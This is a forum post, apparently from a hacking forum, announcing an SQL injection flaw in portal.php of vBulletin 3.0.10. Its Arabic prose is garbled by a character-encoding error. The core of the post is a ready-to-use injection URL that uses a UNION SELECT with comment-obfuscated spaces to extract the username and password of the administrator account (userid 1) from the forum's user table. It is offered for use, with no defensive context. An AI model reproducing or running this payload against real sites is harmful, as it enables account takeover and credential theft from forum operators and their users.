Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: vBulletin Portal.PHP SQL Injection Vulnerability


ÓÑíå ÓÝíÇä Èä ÚæÝ ÇáÛÇãÏí ááÌåÇÏ ÇáßÊÑæäí

Status: Offline
Posts: 632
Date:
vBulletin Portal.PHP SQL Injection Vulnerability
Permalink   
 


ÇáÓáÇã Úáíßã æÑÍãÉ Çááå


ÇáËÛÑå Ýí ÇáÇÕÏÇÑ

vbulletin-3.0.10




Ýí ÇáãáÝ portal.php

ØÑíÞÉ ÇáÇÓÊËãÇÑ äÖíÝ ãä ÎáÝ ãÌáÏ ÇáãäÊÏì



ßæÏ:
portal.php?id=54&a=viewfeature&featureid=99999/**/UNION/**/SELECT/**/0,1,2,3,4,username,6,7,8,9,10,11,12,password/**/from/**/user/**/where/**/userid=1/*


 



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard